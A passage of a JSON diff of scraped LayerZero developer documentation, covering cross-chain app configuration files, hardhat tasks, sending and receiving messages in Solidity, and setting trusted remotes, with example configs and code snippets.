If it isn't specified, the default version will be used. remoteConfigs - an array of configuration settings for remote chains. The configuration section for each chain has the following fields: remoteChain - the remote chain name. inboundProofLibraryVersion - the version of proof library for inbound messages. inboundBlockConfirmations - the number of block confirmations for inbound messages. relayer - the address of Relayer contract. outboundProofType - proof type used for outbound messages. outboundBlockConfirmations - the number of block confirmations for outbound messages. oracle - the address of the Oracle contract. Below is an example of the Gnosis configuration { \"ethereum\" : { \"safeAddress\" : \"0xa36B7e7894aCfaa6c35A8A0EC630B71A6B8A6D22\" , \"url\" : \"https://safe-transaction.mainnet.gnosis.io/\" }, \"bsc\" : { \"safeAddress\" : \"0x4755D44c1C196dC524848200B0556A09084D1dFD\" , \"url\" : \"https://safe-transaction.bsc.gnosis.io/\" }, \"avalanche\" : { \"safeAddress\" : \"0x4FF2C33FD9042a76eaC920C037383E51659417Ee\" , \"url\" : \"https://safe-transaction.avalanche.gnosis.io/\" } } For each chain you need to specify your Gnosis safe address and Gnosis Safe API url. You can find the list of supported chains and API urls in Gnosis Safe documentation . EVM Guides - Previous LayerZero Tooling Next Wire Up Configuration Last modified 3mo ago", + "body": "UA Configuration Describes the available config options in the appConfig.json Tasks The package adds the following tasks: getDefaultConfig returns the default configuration for the specified chains. Usage: npx hardhat getDefaultConfig --networks ethereum,bsc,polygon,avalanche getConfig returns the configuration of the specified contract. Parameters: address - the contract address. An optional parameter. Either contract name or contract address must be specified. name - the contract name. An optional parameter. It must be specified only if the contract was deployed using hardhat-deploy and the deployments information is located in the deployments folder. network - the network the contract is deployed to. remote-networks - a comma separated list of remote networks the contract is configured with. Usage: npx hardhat getConfig --network ethereum --remote-networks bsc,polygon,avalanche --name OFT setConfig sets the configuration of the specified contract. Parameters: config-path - the relative path to a file containing the configuration. address - the address of the deployed contracts. An optional parameter. It should be provided if the contract address is the same on all chains. For contracts with different addresses, specify the address for each chain in the config. name - the name of the deployed contracts. An optional parameter. It should be provided only if the same contract deployed on all chains using hardhat-deploy and the deployment information is located in the deployments folder. For contracts with different names, specify the name for each chain in the config. gnosis-config-path - the relative path to a file containing the gnosis configuration. An optional parameter. If specified, the transactions will be sent to Gnosis. 
Usage: npx hardhat setConfig --networks ethereum,bsc,avalanche --name OFT --config-path \"./appConfig.json\" --gnosis-config-path \"./gnosisConfig.json\" Below is an example of the application configuration { \"ethereum\" : { \"address\" : \"\" , \"name\" : \"ProxyOFT\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"bsc\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 20 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" }, { \"remoteChain\" : \"avalanche\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 12 , \"relayer\" : \"0x902F09715B6303d4173037652FA7377e5b98089E\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 15 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] }, \"bsc\" : { \"address\" : \"0x0702c7B1b18E5EBf022e17182b52F0AC262A8062\" , \"name\" : \"\" , \"sendVersion\" : 2 , \"receiveVersion\" : 2 , \"remoteConfigs\" : [ { \"remoteChain\" : \"ethereum\" , \"inboundProofLibraryVersion\" : 1 , \"inboundBlockConfirmations\" : 15 , \"relayer\" : \"0xA27A2cA24DD28Ce14Fb5f5844b59851F03DCf182\" , \"outboundProofType\" : 1 , \"outboundBlockConfirmations\" : 20 , \"oracle\" : \"0x5a54fe5234E811466D5366846283323c954310B2\" } ] } } The top level elements represent chains the contracts are deployed to. The configuration section for each chain has the following fields: address - the contract address. An optional parameter. It should be provided if no address was specified in the task parameters. name - the contract name. An optional parameter. It should be provided only if the contract was deployed using hardhat-deploy and the deployment information is located in the deployments folder. sendVersion - the version of a messaging library contract used to send messages. If it isn't specified, the default version will be used. receiveVersion - the version of a messaging library contract used to receive messages. If it isn't specified, the default version will be used. remoteConfigs - an array of configuration settings for remote chains. The configuration section for each chain has the following fields: remoteChain - the remote chain name. inboundProofLibraryVersion - the version of proof library for inbound messages. inboundBlockConfirmations - the number of block confirmations for inbound messages. relayer - the address of Relayer contract. outboundProofType - proof type used for outbound messages. outboundBlockConfirmations - the number of block confirmations for outbound messages. oracle - the address of the Oracle contract. Below is an example of the Gnosis configuration { \"ethereum\" : { \"safeAddress\" : \"0xa36B7e7894aCfaa6c35A8A0EC630B71A6B8A6D22\" , \"url\" : \"https://safe-transaction.mainnet.gnosis.io/\" }, \"bsc\" : { \"safeAddress\" : \"0x4755D44c1C196dC524848200B0556A09084D1dFD\" , \"url\" : \"https://safe-transaction.bsc.gnosis.io/\" }, \"avalanche\" : { \"safeAddress\" : \"0x4FF2C33FD9042a76eaC920C037383E51659417Ee\" , \"url\" : \"https://safe-transaction.avalanche.gnosis.io/\" } } For each chain you need to specify your Gnosis safe address and Gnosis Safe API url. You can find the list of supported chains and API urls in Gnosis Safe documentation . 
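Because an N-chain UA needs N^2 pathways, a quick completeness check over the config file can catch gaps before running setConfig (a sketch; assumes appConfig.json follows the schema shown above):

// Flag chains whose remoteConfigs don't cover every other chain in the file.
const config = require("./appConfig.json");
const chains = Object.keys(config);
for (const chain of chains) {
  const wired = new Set((config[chain].remoteConfigs || []).map((r) => r.remoteChain));
  const missing = chains.filter((c) => c !== chain && !wired.has(c));
  if (missing.length) console.warn(chain + " is missing pathways to: " + missing.join(", "));
}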
EVM Guides - Previous LayerZero Tooling Next Wire Up Configuration Last modified 21d ago", "labels": [ "Documentation" ] @@ -1610,7 +1602,7 @@ { "title": "Wire Up Configuration", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-tooling/wire-up-configuration", - "body": "Wire Up Configuration Describes the available config options in the wireUpConfig.json Available configuration options To use the LayerZero wire up configuration please correctly fill in your wireUpConfig.json { \"proxyContractConfig\" { \"chain\" : \"avalanche\" , \"name\" : \"ProxyOFT\" }, \"contractConfig\" { \"name\" : \"OFT\" }, \"chainConfig\" : { \"avalanche\" : { \"defaultFeeBp\" : 2 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"ethereum\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true }, \"minDstGasConfig\" : [ 100000 , 200000 ] }, \"polygon\" : { \"minDstGasConfig\" : [ 100000 , 160000 ] } } } } } The proxyContractConfig is an optional setting, that defines the proxy chain and proxy contract name. chain : An optional string, defines the proxy chain. name : An optional string, defines the proxy contract name. address : A optional string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls such as: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) The contractConfig is a conditionally required setting, that defines the contract name. name : A conditionally required string, defines the contract name. Used when all contract names are the same on all chains, excluding proxy. The chainConfig : is required and defines the chain settings (default fees, useCustomAdapterParams) and the remote chain configs (minDstGas config based of packetType, and custom feeBP per chain) name : A conditionally required string, defines the contract name. Used when contract names differ per chain. address : A conditionally required string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls. defaultFeeBp : An optional number, defines the default fee bp for the chain. (Available in OFTV2 w/ fee .) useCustomAdapterParams : An optional bool that defaults to false . Uses default 200k destination gas on all cross chain messages. When false adapter parameters must be empty. When useCustomAdapterParams is true the minDstGasLookup must be set for each packet type and each chain . This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set for that packet type and that destination chain. The remoteNetworkConfig is a required setting that defines the remote chain configs (minDstGas config based on packetType, and custom feeBP per chain) minDstGasConfig : is an optional array of numbers that defines the minDstGas required based off packetType. In the example above minDstGasConfig has a length of 2 with the indexes representing the packet type. So for example when the UA on Avalanche sends packet type 0 to Ethereum the minDstGas will be 100000. When the UA on Avalanche sends packet type 1 to Polygon the minDstGas will be 160000. The feeBpConfig is an optional setting that defines custom feeBP per chain. ( Note: setting custom fee per chain with enabled = TRUE, will triumph over defaultFeeBp.) 
feeBp : is an optional number, defines custom feeBP per chain. enabled : is an optional bool, defines if custom feeBP per chain is enabled Example wireUpConfigs Example 1: { \"contractConfig\" { \"name\" : \"OFT\" }, \"fuji\" : { \"defaultFeeBp\" : 5 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"minDstGasConfig\" : [ 2000000 , 3200000 ] }, \"bsc-testnet\" : { \"minDstGasConfig\" : [ 100000 , 160000 ] } } } } This configuration is setting a defaultFeeBp of 5 for all transactions on fuji. This configuration is also setting the minDstGasLookup based on packet types. The minDstGasConfig has a length of 2 with the indexes representing the packet type. So for example when the UA on fuji sends packet type 0 to arbitrum-goerli the minDstGas will be 2000000. When the UA on fuji sends packet type 1 to bsc-testnet the minDstGas will be 160000. Example 2: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"name\" : \"ExampleProxyOFTV2\" } \"chainConfig\" : { \"fuji\" : { \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 2 } }, \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 3 } } } }, \"bsc-testnet\" : { \"name\" : \"BscOFTV2\" , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 4 , \"enabled\" : true } } } }, \"arbitrum-goerli\" : { \"name\" : \"ArbitrumOFTV2\" , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"feeBp\" : 1 , \"enabled\" : true } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 2 , \"enabled\" : true } } } } } } This configuration uses name per chain because each chain has a different contract name. This configuration is setting a custom bp fee per pathway instead of a defaultFeeBp. This configuration is not using custom adapter params and is opting into the default 200000 gas . 
Example 3: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"address\" : \"0x0000000000000000000000000000000000000000\" }, \"chainConfig\" : { \"fuji\" : { \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : false , \"feeBp\" : 0 }, \"minDstGasConfig\" : [ 100000 , 160000 ] } } }, \"bsc-testnet\" : { \"address\" : \"0x0000000000000000000000000000000000000000\" , \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 0 , \"enabled\" : false }, \"minDstGasConfig\" : [ 100000 , 160000 ] } } } } } This configuration uses address per chain and relys on the contracts containing the following ABI's: function setTrustedRemote(uint16, bytes) function setUseCustomAdapterParams(bool) function setMinDstGas(uint16, uint16, uint) function setDefaultFeeBp(uint16) function setFeeBp(uint16, bool, uint16) Previous UA Configuration Next - EVM Guides Omnichain Governance Last modified 3mo ago", + "body": "Wire Up Configuration Describes the available config options in the wireUpConfig.json Available configuration options To use the LayerZero wire up configuration please correctly fill in your wireUpConfig.json { \"proxyContractConfig\" : { \"chain\" : \"avalanche\" , \"name\" : \"ProxyOFT\" }, \"contractConfig\" : { \"name\" : \"OFT\" }, \"chainConfig\" : { \"avalanche\" : { \"defaultFeeBp\" : 2 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"ethereum\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 2000000 } }, \"polygon\" : { \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } } The proxyContractConfig is an optional setting, that defines the proxy chain and proxy contract name. chain : An optional string, defines the proxy chain. name : An optional string, defines the proxy contract name. address : A optional string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls such as: function setFeeBp(uint16, bool, uint16) function setDefaultFeeBp(uint16) function setMinDstGas(uint16, uint16, uint) function setUseCustomAdapterParams(bool) function setTrustedRemote(uint16, bytes) The contractConfig is a conditionally required setting, that defines the contract name. name : A conditionally required string, defines the contract name. Used when all contract names are the same on all chains, excluding proxy. The chainConfig : is required and defines the chain settings (default fees, useCustomAdapterParams) and the remote chain configs (minDstGas config based of packetType, and custom feeBP per chain) name : A conditionally required string, defines the contract name. Used when contract names differ per chain. address : A conditionally required string, defines the contract address. Used when deployments folder are not available. Uses standard LzApp/Nonblocking/OFT/ONFT abi calls. defaultFeeBp : An optional number, defines the default fee bp for the chain. (Available in OFTV2 w/ fee .) useCustomAdapterParams : An optional bool that defaults to false . Uses default 200k destination gas on all cross chain messages. When false adapter parameters must be empty. When useCustomAdapterParams is true the minDstGasLookup must be set for each packet type and each chain . 
This requires whoever calls the send function to provide the adapter params with a destination gas >= amount set for that packet type and that destination chain. The remoteNetworkConfig is a required setting that defines the remote chain configs (minDstGas config based on packetType, and custom feeBP per chain) minDstGasConfig : is an optional object that defines the minDstGas required based on packetType. So for example when the UA on Avalanche sends packet type 0 to Ethereum the minDstGas will be 100000. When the UA on Avalanche sends packet type 1 to Polygon the minDstGas will be 160000. The feeBpConfig is an optional setting that defines custom feeBP per chain. ( Note: setting custom fee per chain with enabled = TRUE will take precedence over defaultFeeBp.) feeBp : is an optional number, defines custom feeBP per chain. enabled : is an optional bool, defines whether custom feeBP per chain is enabled. Example wireUpConfigs Example 1: { \"contractConfig\" : { \"name\" : \"OFT\" }, \"fuji\" : { \"defaultFeeBp\" : 5 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"minDstGasConfig\" : { \"packetType_0\" : 2000000 , \"packetType_1\" : 3200000 } }, \"bsc-testnet\" : { \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } This configuration is setting a defaultFeeBp of 5 for all transactions on fuji. This configuration is also setting the minDstGasLookup based on packet types. The minDstGasConfig sets a value for each packet type (packetType_0 and packetType_1). So for example when the UA on fuji sends packet type 0 to arbitrum-goerli the minDstGas will be 2000000. When the UA on fuji sends packet type 1 to bsc-testnet the minDstGas will be 160000. Example 2: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"name\" : \"ExampleProxyOFTV2\" }, \"chainConfig\" : { \"fuji\" : { \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 2 }, \"minDstGasConfig\" : { \"packetType_0\" : 2000000 , \"packetType_1\" : 3200000 } }, \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : true , \"feeBp\" : 3 }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } }, \"bsc-testnet\" : { \"name\" : \"BscOFTV2\" , \"remoteNetworkConfig\" : { \"arbitrum-goerli\" : { \"feeBpConfig\" : { \"feeBp\" : 5 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 2000000 , \"packetType_1\" : 3200000 } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 4 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } }, \"arbitrum-goerli\" : { \"name\" : \"ArbitrumOFTV2\" , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"feeBp\" : 1 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } }, \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 2 , \"enabled\" : true }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } } This configuration uses name per chain because each chain has a different contract name. This configuration is setting a custom bp fee per pathway instead of a defaultFeeBp. 
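A similar sketch for the fee settings: setDefaultFeeBp sets the chain-wide fallback, and an enabled per-pathway setFeeBp takes precedence over it. The parameter order (dstChainId, enabled, feeBp) is inferred from the types listed above; verify it against your contract before relying on it:

```ts
import { Contract } from "ethers";
import { ethers } from "hardhat";

// ABI fragments from the list above; the address and ids are placeholders.
const abi = [
  "function setDefaultFeeBp(uint16)",
  "function setFeeBp(uint16, bool, uint16)",
];

async function setFees() {
  const [owner] = await ethers.getSigners();
  const oft = new Contract("0x0000000000000000000000000000000000000000", abi, owner); // placeholder
  await (await oft.setDefaultFeeBp(5)).wait(); // fallback fee for all pathways
  // Per-pathway override: with enabled = true this takes precedence over the default.
  await (await oft.setFeeBp(101, true, 2)).wait(); // assumed order: (dstChainId, enabled, feeBp)
}
```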
Example 3: { \"proxyContractConfig\" : { \"chain\" : \"fuji\" , \"address\" : \"0x0000000000000000000000000000000000000000\" }, \"chainConfig\" : { \"fuji\" : { \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"bsc-testnet\" : { \"feeBpConfig\" : { \"enabled\" : false , \"feeBp\" : 0 }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } }, \"bsc-testnet\" : { \"address\" : \"0x0000000000000000000000000000000000000000\" , \"defaultFeeBp\" : 0 , \"useCustomAdapterParams\" : true , \"remoteNetworkConfig\" : { \"fuji\" : { \"feeBpConfig\" : { \"feeBp\" : 0 , \"enabled\" : false }, \"minDstGasConfig\" : { \"packetType_0\" : 100000 , \"packetType_1\" : 160000 } } } } } } This configuration uses address per chain and relys on the contracts containing the following ABI's: function setTrustedRemote(uint16, bytes) function setUseCustomAdapterParams(bool) function setMinDstGas(uint16, uint16, uint) function setDefaultFeeBp(uint16) function setFeeBp(uint16, bool, uint16) Previous UA Configuration Next - EVM Guides Omnichain Governance Last modified 14d ago", "labels": [ "Documentation" ] @@ -1618,7 +1610,7 @@ { "title": "Send Messages", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master/how-to-send-a-message", - "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts (similar to the CounterMock ) to send a cross chain message. // an endpoint is the contract which has the send() function ILayerZeroEndpoint public endpoint ; // remote address concated with local address packed into 40 bytes bytes memory remoteAndLocalAddresses = abi . encodePacked ( remoteAddress , localAddress ); // call send() to send a message/payload to another chain endpoint . send { value : msg . value }( 10001 , // destination LayerZero chainId remoteAndLocalAddresses , // send to this address on the destination bytes ( \"hello\" ), // bytes payload msg . sender , // refund address address ( 0x0 ), // future parameter bytes ( \"\" ) // adapterParams (see \"Advanced Features\") ); Here is an explanation of the endpoint.send() interface: // @notice send a LayerZero message to the specified address at a LayerZero endpoint specified by our chainId. // @param _dstChainId - the destination chain identifier // @param _remoteAndLocalAddresses - remote address concated with local address packed into 40 bytes // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _remoteAndLocalAddresses , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; You will note in the topmost example we call send() with {value: msg.value} this is because send() requires a bit of native gas token so the relayer can complete the message delivery on the destination chain. 
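The required native fee can be quoted up front rather than guessed. A hedged sketch using ILayerZeroEndpoint.estimateFees; the endpoint address is a placeholder, and incrementCounter is the OmniCounter example method shown in this section:

```ts
import { Contract } from "ethers";
import { ethers } from "hardhat";

// estimateFees quotes (nativeFee, zroFee) for a given destination, payload, and adapter params.
const endpointAbi = [
  "function estimateFees(uint16, address, bytes, bool, bytes) view returns (uint nativeFee, uint zroFee)",
];

async function sendWithFee(ua: Contract, dstChainId: number, payload: string) {
  const endpoint = new Contract(
    "0x0000000000000000000000000000000000000000", // placeholder endpoint address; see the address tables later in these docs
    endpointAbi,
    ua.signer
  );
  const [nativeFee] = await endpoint.estimateFees(dstChainId, ua.address, payload, false, "0x");
  // Forward the quoted fee as msg.value on the UA call that triggers endpoint.send().
  await ua.incrementCounter(dstChainId, { value: nativeFee });
}
```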
If you don't set this value you might get this error when calling endpoint.send() Putting it into a more complete example, your User Application contract may look something like this: pragma solidity 0.8.4 ; pragma abicoder v2 ; import \"../lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { // _nonblockingLzReceive is how we provide custom logic to lzReceive() // in this case, increment a counter when a message is received. counter += 1 ; } function incrementCounter ( uint16 _dstChainId ) public payable { // _lzSend calls endpoint.send() _lzSend ( _dstChainId , bytes ( \"\" ), payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" )); } } There you have it! Call incrementCounter() to send a LayerZero message to another chain. See the next section for how to handle receiving the message by implementing lzReceive() and also see how to execute any smart contract logic on the destination. Putting together a full User Application contract simply means implementing a way to call endpoint.send() and ensuring lzReceive() is overridden to handle receiving messages (see ILayerZeroReceiver.sol for the lzReceive() interface) OmniChainToken is a slightly more complex example of a omnichain contract. Estimating Message Fees If you want to know how much {value: xxx} to give to the send() function to pay for you message please refer to this section on estimating fees . Adapter Parameters Also see advanced message features using Adapter Parameters (aka: _adapterParameters ) EVM Guides - Previous Getting Started Next Receive Messages Last modified 3mo ago", + "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Call the send() function in your contracts (similar to the CounterMock ) to send a cross-chain message. // an endpoint is the contract which has the send() function ILayerZeroEndpoint public endpoint ; // remote address concatenated with local address packed into 40 bytes bytes memory remoteAndLocalAddresses = abi . encodePacked ( remoteAddress , localAddress ); // call send() to send a message/payload to another chain endpoint . send { value : msg . value }( 10001 , // destination LayerZero chainId remoteAndLocalAddresses , // send to this address on the destination bytes ( \"hello\" ), // bytes payload msg . sender , // refund address address ( 0x0 ), // future parameter bytes ( \"\" ) // adapterParams (see \"Advanced Features\") ); Here is an explanation of the endpoint.send() interface: // @notice send a LayerZero message to the specified address at a LayerZero endpoint specified by our chainId. // @param _dstChainId - the destination chain identifier // @param _remoteAndLocalAddresses - remote address concatenated with local address packed into 40 bytes // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. 
receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _remoteAndLocalAddresses , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; You will note in the topmost example we call send() with {value: msg.value}; this is because send() requires a bit of native gas token so the relayer can complete the message delivery on the destination chain. If you don't set this value you might get this error when calling endpoint.send() Putting it into a more complete example, your User Application contract may look something like this: pragma solidity 0.8.4 ; pragma abicoder v2 ; import \"../lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { // _nonblockingLzReceive is how we provide custom logic to lzReceive() // in this case, increment a counter when a message is received. counter += 1 ; } function incrementCounter ( uint16 _dstChainId ) public payable { // _lzSend calls endpoint.send() _lzSend ( _dstChainId , bytes ( \"\" ), payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" )); } } There you have it! Call incrementCounter() to send a LayerZero message to another chain. See the next section for how to handle receiving the message by implementing lzReceive() and also see how to execute any smart contract logic on the destination. Putting together a full User Application contract simply means implementing a way to call endpoint.send() and ensuring lzReceive() is overridden to handle receiving messages (see ILayerZeroReceiver.sol for the lzReceive() interface). OmniChainToken is a slightly more complex example of an omnichain contract. Estimating Message Fees If you want to know how much {value: xxx} to give to the send() function to pay for your message please refer to this section on estimating fees . Adapter Parameters Also see advanced message features using Adapter Parameters (aka: _adapterParameters ) EVM Guides - Previous Getting Started Next Receive Messages Last modified 1d ago", "labels": [ "Documentation" ] @@ -1626,7 +1618,7 @@ { "title": "Receive Messages", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master/receive-messages", - "body": "Receive Messages Destination contracts must implement lzReceive() to handle incoming messages The code snippet explains how the message will be received. To receive a message, your User Application contract must implement the ILayerZeroReceiver interface and override the lzReceive() function pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload is the UA bytes has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } Below is a snippet that shows an implementation of lzReceive() . 
Here we demonstrate how to extract an address out of the payload and increment a counter each time this contract receives any message. UAs should authenticate the received messages with: the caller is the known LayerZero endpoint the srcAddress is a trusted known address on the _srcChain . If the application will connect non-evm chains, the UA should use bytes to store addresses. mapping ( address => uint ) public addrCounter ; mapping ( uint16 => bytes ) public trustedRemoteLookup ; // override from ILayerZeroReceiver.sol function lzReceive ( uint16 _srcChainId , bytes memory _srcAddress , uint64 _nonce , bytes memory _payload ) override external { require ( msg . sender == address ( endpoint )); require ( keccak256 ( _srcAddress ) == keccak256 ( trustedRemoteLookup [ _srcChainId ]); address fromAddress ; assembly { fromAddress := mload ( add ( _srcAddress , 20 )) } addrCounter [ fromAddress ] += 1 ; } Check the CounterMock for examples. Previous Send Messages Next Set Trusted Remotes Last modified 3mo ago", + "body": "Receive Messages Destination contracts must implement lzReceive() to handle incoming messages The code snippet explains how the message will be received. To receive a message, your User Application contract must implement the ILayerZeroReceiver interface and override the lzReceive() function pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload, i.e. the bytes the UA has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } Below is a snippet that shows an implementation of lzReceive() . Here we demonstrate how to extract an address out of the payload and increment a counter each time this contract receives any message. UAs should authenticate received messages by checking that: (1) the caller is the known LayerZero endpoint, and (2) the srcAddress is a trusted known address on the _srcChain . If the application will connect non-evm chains, the UA should use bytes to store addresses. mapping ( address => uint ) public addrCounter ; mapping ( uint16 => bytes ) public trustedRemoteLookup ; // override from ILayerZeroReceiver.sol function lzReceive ( uint16 _srcChainId , bytes memory _srcAddress , uint64 _nonce , bytes memory _payload ) override external { require ( msg . sender == address ( endpoint )); require ( keccak256 ( _srcAddress ) == keccak256 ( trustedRemoteLookup [ _srcChainId ])); address fromAddress ; assembly { fromAddress := mload ( add ( _srcAddress , 20 )) } addrCounter [ fromAddress ] += 1 ; } Check the CounterMock for examples. Previous Send Messages Next Set Trusted Remotes Last modified 1d ago", "labels": [ "Documentation" ] @@ -1634,7 +1626,7 @@ { "title": "Set Trusted Remotes", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/master/set-trusted-remotes", - "body": "Set Trusted Remotes For a contract using LayerZero, a trusted remote is another contract it will accept messages from. What is a Trusted Remote? A trusted remote is the 40 bytes (for evm-to-evm messaging) that identifies another contract which you will receive messages from within your LayerZero User Application contract. 
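Off-chain, the same 40-byte path can be unpacked to recover the remote sender that the assembly in the lzReceive snippet above extracts on-chain. A small ethers.js sketch; the function name is illustrative:

```ts
import { utils } from "ethers";

// _srcAddress is remoteAddress (20 bytes) concatenated with localAddress (20 bytes),
// so the remote sender is the first 20 bytes of the path.
function decodeSrcAddress(srcAddress: string): { remote: string; local: string } {
  if (utils.arrayify(srcAddress).length !== 40) {
    throw new Error("expected a 40-byte evm-to-evm path");
  }
  return {
    remote: utils.getAddress(utils.hexDataSlice(srcAddress, 0, 20)),
    local: utils.getAddress(utils.hexDataSlice(srcAddress, 20, 40)),
  };
}
```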
The 40 bytes object is the packed bytes of the remoteAddress + localAddress The reason to care about Trusted Remotes is that from a security perspective contracts should only receive messages from known contracts. Hence, contracts are securely connected by \"setting trusted remotes\" The team has produced this GitHub Repository as an example of how to automate setting trusted remotes. 40 byte Format for EVM <> EVM, A Trusted Remote is 40 bytes. It is the REMOTE contract address concatenated with the LOCAL contract address. Solana, Aptos, et al. & 32 Byte Addresses For NON-evm chains with addresses that are not 20 bytes obviously the Trusted Remotes will not be exactly 40 bytes, but we will regularly use \"40 byte\" Trusted Remotes in the nomenclature. Generate TrustedRemote Using Ethers.js // the trusted remote (or sometimes referred to as the path or pathData) // is the packed 40 bytes object of the REMOTE + LOCAL user application contract addresses let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) Trusted Remote Usage: The Trusted Remote is now used in a few places. Here is a list of which functions expect the trusted remote format: Function Param Is it a trusted remote? Endpoint retryPayload() _srcAddress Endpoint hasStoredPayload() _srcAddress Endpoint forceResumeReceive() _srcAddress LzApp setTrustedRemote() _path LzApp isTrustedRemote() _srcAddress lzReceive() _srcAddress 